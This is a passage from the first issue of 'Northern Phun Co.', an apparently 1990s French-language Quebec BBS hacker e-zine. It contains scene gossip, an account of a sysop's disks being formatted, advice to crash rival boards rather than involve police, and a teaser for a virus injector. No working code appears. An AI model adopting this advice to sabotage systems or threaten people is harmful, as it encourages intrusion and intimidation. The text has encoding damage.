ou tarifs exorbitants ou des ratios impossibles � respecter si on
ne fait pas de L.D. aux States.  Le sysop de Eldar's est de plus
TRES strict, c'est le moins qu'on puisse dire. On pourrait
r�sumer l'attitude de Slum Dweller en une phrase: une main de fer
dans un gant de... b�ton! Ce dernier fonctionne avec des ratios
car, fouille-mo�, il consid�re le fait d'exiger des sous comme
immoral... En ce qui concerne The Joker, que dire sauf que...
Ecoutez, je vais tenter de vous illustrer le fond de ma pens�e par
cet exemple: The Joker (qui est un brave type, � sa fa�on) s'est
fait formater ses H.D. r�cemment. Pour autant que nous le sachions,
il soup�onne encore les types d'Eldar's d'avoir perp�tr� ce
forfait. Et pourquoi soup�onne-t'il Eldar's? Parce que The Joker
avait lui-m�me fait un post dans son board, quelques jours
auparavant, o� il lan�ait des attaques du genre:
MEGA-FUCKING TO THE BOYS OF ELDAR'S. WE'LL KILL EVERYONE OF YOU,
BOYS, DON'T YOU WORRY! C'est le genre de comportement qui demande
une r�plique, me direz-vous. Je vous l'accorde, mais... Slum
Dweller et ses copains n'ont rien � voir dans cette attaque.
Faites-moi confiance, le coup est parti d'ailleurs (Woah! On se
croirait dans J.F.K., avec l'histoire du deuxi�me tireur!). La
personne qui l'a format� m'a racont� que la personnalit� du sysop
ne lui revenait pas, tout simplement. Et, ce qui n'a pas aid�,
il m'a aussi dit que son co-sysop puait de la gueule. Bien que,
personnellement, The Joker ne m'aie jamais apparu comme quelqu'un
d'antipathique (bien au contraire, il m�rite � �tre connu), je
me range de cet avis en ce qui concerne The Genius, alias Dexxa,
alias Cobra (H�! C'est pas une attaque personnelle, mon mec! Je
n'ai m�me pas donn� ton vrai nom, ni ton num�ro de t�l�phone et
tout le bazar! C'est seulement que ta personnalit� �lectronique
laisse � d�sirer...). Pour sa d�fense, sachez que The Genius est
probablement un des runners les plus efficaces de la r�gion de
QU�BEC. Le type fait des L.D. comme certains respirent! Le nombre
de megs qu'il uploade � chaque semaine chez Joker's Den est
sup�rieur � son quotient intellectuel! Un excellent runner, donc,
mais cette qualit� est bien souvent ombrag�e par son caract�re.
Sa route est litt�ralement parsem�e de cadavres (au figur�...
jusqu'� maintenant, du moins). Le nombre de babilleurs que ce mec
a cross� vous laisserait pantois! A ce que je sache, il est, �
ce jour, barr� de chez Dark World, Bad Land et Venom. D'autres
babillards suivront s�rement... 'Nuff said! Si vous le croisez,
changez de trottoir.
Un dernier mot sur les megas-babs de Qu�bec: il semblerait que
T.D.T. aie deux nodes � Qu�bec. Contactez-nous, les mecs! On veut
vous connaitre!
On vient de parler d'un bab  (majeur) qui vient de se faire
planter mais, dans le fond, on dirait que les babs tombent comme
des mouches ces jours-ci. Venom et Dark World sont pass�s au cash
Et je vous parle m�me pas de l'abruti qui a menac� de rapporter
Xenophobic Tendancies (change ce nom, mec, il me fait grincer des
dents!) � la GRC. Nous ne donnerons pas son nom ici, un) parce
que la rubrique "r�glements de compte" n'est pas encore d�marr�e,
et parce que deux) son nom est post� dans � peu pr�s tous les
babs. Mais notre position est celle-ci: vous pouvez toujours vous
chicaner pour savoir qui a le plus gros modem, vous pouvez
toujours vous cr�per le chignon parce-que-mon-p�re-est-plus-fort-
que-le-tien, mais, de gr�ce, laissez les flics hors de �a! La
GRC, c'est comme le SIDA, les mecs: tu ne raconterais pas � la
minette que tu veux lever que tu es infect�, m�me en farce, de
peur qu'elle ne trouve pas la plaisanterie de bon go�t, ou pire,
de peur qu'elle te croie... Un bab, c'est comme une  minette, les
mecs, faut pas lui faire peur avec des GROS microbes. Si vous
aimez pas quelqu'un, stie, plantez son bab, cassez-lui les
jambes, je sais pas, envoyez-lui votre belle-m�re, mais, s'il-
vous-pla�t, gardez �a en famille et ne m�lez pas les flics l�-
dedans... ou alors, c'est que nous avons affaire � un idiot
cong�nital, qui va devoir d�sormais regarder des deux c�t�s de
la rue avant de traverser, de peur qu'un camion se cache derri�re
la borne fontaine...

Le mois prochain: les boards underground (files), les cartes
d'appel, un INJECTOR pour les virus, et plein de petites
g�teries. Watch out for NPC-II!!! D'ici l�, on va se faire
violence et accepter vos commentaires... Non, s�rieusement, vous
�tes bien �videmment invit�s � nous contacter, pour nous poser
des questions techniques sur tout ce qui concerne l'underground
(car � compter du mois prochain, nous animerons un forum des
lecteurs), nous soumettre votre candidature si vous �tes
int�ress�s � devenir des collaborateurs de NPC, ou, mieux encore,
nous proposer une chronique ou un article pour le prochain num�ro
de Northern Phun Co. - The magazine.

Pour nous rejoindre, rien de plus facile! En tout premier lieu,
il y a MEDIC BBS (oui! UN BAB SHAREWARE!): le sysop le plus cool
de ce c�t�-ci du Rio Grande s'est gracieusement offert � nous
offrir une bo�te aux lettres. Get this, boys and girls, vous
pouvez nous laisser des messages anonymes, sans que vous puissiez
�tre retra��s de quelque mani�re que ce soit. Voici comment �a
va fonctionner, les touts p'tits: lorsque vous obtenez un login
chez Medic, tapez tout simplement GUEST, et le mot de passe
(GUEST), pour avoir acc�s � une section sp�ciale de la messagerie
r�serv�e � NPC. Attention! Le reste du babillard vous sera
interdit! Vous devrez reloguer, sous votre nom r�gulier cette
fois, si vous d�sirez continuer vos p�r�grinations dans ce que
nous consid�rons tous, � l'unanimit�, comme le board public le
plus complet et le plus professionnel que Qu�bec ait jamais
acceuilli. Laissez le message � ce nom (NPC), anonyme si vous le
d�sirez (pour les grands timides...) ou avec votre handle
r�gulier. Ne vous inqui�tez pas, on va vous retrouver!
Naturellement, si vous d�sirez nous laisser des informations
suppl�mentaires, ce sera beaucoup plus facile (on n'aura pas �
soudoyer votre concierge!).
Il y a aussi le dernier, mais non le moindre, Land of Silence
(comme vous le voyez, on ne s'associe vraiment qu'avec les
meilleurs!) qui constitue en somme notre home away from home...
Pour ceux qui croient qu'un mec comme Coaxial est vraiment tomb�
sous le coup d'un trojan, allez-vous rhabiller... L.O.S. est
d�sormais r�serv� exclusivement aux membres en r�gle de NPC.
L'acc�s est plut�t difficile pour le commun des mortels...


Greets go to: Pixture God, Nancy Reagan, et Yakoul.


        ---==Fin de Northern Phun Co.- The magazine - NPC-I==---


     �����ͻ
    ڶ N   ǿ    �Ŀ    ���     �����Ŀ  ����Ŀ �������Ŀ    �Ŀ
 ��Ĵ�  P  ����Ŀ� �     ����Ŀ � ��  �����Ŀ ��ſ     �����Ĵ1�
    ��   C ��   ����     �    ����     �  �   ��     ��    ���
     �����ͼ     ���������               ����
Tous ceux qui trouveront la solution du r�bus re�evront un PBX gratuit...